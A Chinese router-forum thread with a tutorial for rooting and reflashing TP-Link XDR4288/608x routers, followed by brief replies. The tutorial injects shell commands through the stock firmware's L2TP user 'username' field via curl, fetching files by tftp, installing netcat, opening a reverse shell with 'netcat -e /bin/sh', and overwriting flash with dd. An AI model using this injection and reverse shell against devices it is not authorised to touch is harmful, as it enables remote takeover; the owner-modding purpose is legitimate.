找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888
查看: 38663|回复: 206

TP-Link TL-XDR4288/608x 免拆刷机教程

 火... [复制链接]
发表于 2023-2-14 16:19 | 显示全部楼层 |阅读模式
本帖最后由 无名游客 于 2023-5-18 18:06 编辑

我个人还是很喜欢 XDR6086 的,双 2.5G 加 usb 3.2,这不薄纱某米。话不多说,这就放教程:

1. 首先打开原厂固件的后台界面,按 F12 打开开发者模式,记下当前的 stok,如图所示:
http://192.168.1.1/stok=<stok>/ds,stok 复制出来下面要用


2. 利用原厂 virtual** 的 L2TP 服务器漏洞执行注入命令
命令会在状态关闭时执行,执行完记得把当前命令删除



op 论坛那边用的是 U 盘:https://openwrt.org/inbox/toh/tp-link/xdr-6086#rooting
这里我是使用 WSL 发送 curl 命令执行操作,tftp 传输文件,你们自己看着参考:
假设你的电脑 IP 是 192.168.1.100,根据实际情况替换 IP 和 <stok>
将 netcat.ipk 和 xdr608x-bl2.bin、xdr608x-fip.bin 放到 tftpd64 目录下
  1. curl -H "Content-Type: application/json" -X POST -d '{"virtual**":{"table":"user","para":{"username":";tftp -g -l netcat.ipk -r netcat.ipk 192.168.1.100 &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds
  2. curl -H "Content-Type: application/json" -X POST -d '{"virtual**":{"table":"user","para":{"username":";opkg install netcat.ipk &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds
复制代码

这里我们已经安装好 netcat 了,另开一个终端窗口执行:
  1. nc -nlvp 4444
复制代码
在原来的窗口继续执行如下命令打开 nc 连接:
  1. curl -H "Content-Type: application/json" -X POST -d '{"virtual**":{"table":"user","para":{"username":";netcat -e /bin/sh 192.168.1.100 4444  &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds
复制代码
类似这样就是连接成功了:

接下来就是上传不死了,在原来的窗口继续执行:
  1. curl -H "Content-Type: application/json" -X POST -d '{"virtual**":{"table":"user","para":{"username":";tftp -g -l xdr608x-bl2.bin -r xdr608x-bl2.bin 192.168.1.100 &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds
  2. curl -H "Content-Type: application/json" -X POST -d '{"virtual**":{"table":"user","para":{"username":";tftp -g -l xdr608x-fip.bin -r xdr608x-fip.bin 192.168.1.100 &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds
复制代码
现在切换到 nc 窗口,先输 ls 命令看看文件传上去没有,执行如下命令刷入:
  1. dd bs=131072 conv=sync of=/dev/mtdblock9 if=xdr608x-bl2.bin
  2. dd bs=131072 conv=sync of=/dev/mtdblock9 seek=28 if=xdr608x-fip.bin
复制代码
3. 拔电重启,网线接路由器的千兆口,电脑设置 192.168.1.x 的静态地址,浏览器打开 192.168.1.1,
根据机型选择我发的固件(squashfs-sysupgrade.bin)上传刷入,然后就是 enjoy 时间啦~

刷机要用的文件:https://url10.ctfile.com/d/40253010-54351986-056d0b?p=6923 (访问密码: 6923)

2023 年 5 月更新:
       1. 修复 2.5G 网口,添加无线硬件加速开关
       2. 添加 xdr4288 支持,不死通用,刷入对应名称的固件即可

注:1. 固件基于 lede 源码编译,并更新了无线组件
          追求信号的推荐开低信道 80MHz,mt76 的 160MHz 天天炸
       2. 不死(包括 360t7 的)不兼容官方 openwrt,这不是 bug

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×

评分

参与人数 16恩山币 +19 收起 理由
待在绿*** + 1 感谢你的分享,无论怎样,你都是最无私的人.
cd*** + 1 你好,久仰卧龙大名,在下凤雏!.
Android*** + 1 给dalao递体力
ram*** + 1 这个教程可以用在XDR4288上吗?希望大佬出.
我妻*** + 2 你好,久仰卧龙大名,在下凤雏!
laog*** + 1 curl执行成功,但监听端口连接不上,版本1..
小牛*** + 1 感谢分享!
54*** + 2 你好,久仰卧龙大名,在下凤雏!
fashi*** + 2 一看就是觉得高端、大气、上档次!
like*** + 1 你好,久仰卧龙大名,在下凤雏!
Asuk*** + 1 强大的恩山!(以下重复1万次)
Para*** + 1 感谢你的分享,无论怎样,你都是最无私的人.
ro*** + 1 送你一块“恩山”牌肥皂,喏,就在你脚下、.
Dan*** + 1 让我们一起面朝大海、花开花落……
z54*** + 1 这个年轻人不讲武德,耗子尾汁!
tangdas*** + 1 你好,久仰卧龙大名,在下凤雏!

查看全部评分

发表于 2023-2-14 16:37 | 显示全部楼层
本帖最后由 z54_007 于 2023-2-14 16:40 编辑

暗云大佬牛批!!!(破音
回复 支持 反对

使用道具 举报

发表于 2023-2-14 16:37 | 显示全部楼层
感谢分享!!
回复 支持 反对

使用道具 举报

发表于 2023-2-14 16:37 | 显示全部楼层
今天是情人节,参加佐大OpenWrt培训班有优惠哦,情人节有佐大陪伴你。
回复 支持 反对

使用道具 举报

发表于 2023-2-14 16:38 | 显示全部楼层
TP有2.5也垃圾 还不如FTTR香

点评

但凡你懂FTTR,你就知道局限性,也不会这么说了。  详情 回复 发表于 2023-2-14 16:55
但凡了解fttr原理也不会说这种话  详情 回复 发表于 2023-2-14 16:41
回复 支持 反对

使用道具 举报

发表于 2023-2-14 16:38 | 显示全部楼层
来支持啦!!!!
回复 支持 反对

使用道具 举报

发表于 2023-2-14 16:39 来自手机 | 显示全部楼层
暗云喵喵贴贴
回复 支持 反对

使用道具 举报

发表于 2023-2-14 16:39 | 显示全部楼层

暗云大佬牛批!!!(破音
回复 支持 反对

使用道具 举报

发表于 2023-2-14 16:41 | 显示全部楼层
wife8023 发表于 2023-2-14 16:38
TP有2.5也垃圾 还不如FTTR香

但凡了解fttr原理也不会说这种话
回复 支持 反对

使用道具 举报

发表于 2023-2-14 16:44 | 显示全部楼层
666
回复 支持 反对

使用道具 举报

发表于 2023-2-14 16:47 来自手机 | 显示全部楼层
支持支持
回复 支持 反对

使用道具 举报

发表于 2023-2-14 16:47 | 显示全部楼层

666
66
回复 支持 反对

使用道具 举报

发表于 2023-2-14 16:48 来自手机 | 显示全部楼层
暗云!暗云!暗云!
回复 支持 反对

使用道具 举报

发表于 2023-2-14 16:52 | 显示全部楼层
大佬,这个方法对TP6086或6088的原厂固件版本有要求吗?我前些日子把6088升级到了1.0.24版本.

点评

你开了ssh就没要求,开不了ssh就刷不了  详情 回复 发表于 2023-2-14 16:56
回复 支持 反对

使用道具 举报

发表于 2023-2-14 16:55 | 显示全部楼层
wife8023 发表于 2023-2-14 16:38
TP有2.5也垃圾 还不如FTTR香

但凡你懂FTTR,你就知道局限性,也不会这么说了。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关闭

欢迎大家光临恩山无线论坛上一条 /1 下一条

有疑问请添加管理员QQ86788181|手机版|小黑屋|Archiver|恩山无线论坛(常州市恩山计算机开发有限公司版权所有) ( 苏ICP备05084872号 )

GMT+8, 2024-6-4 15:07

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

| 江苏省互联网有害信息举报中心 举报信箱:js12377 | @jischina.com.cn 举报电话:025-88802724 本站不良内容举报信箱:68610888@qq.com 举报电话:0519-86695797

快速回复 返回顶部 返回列表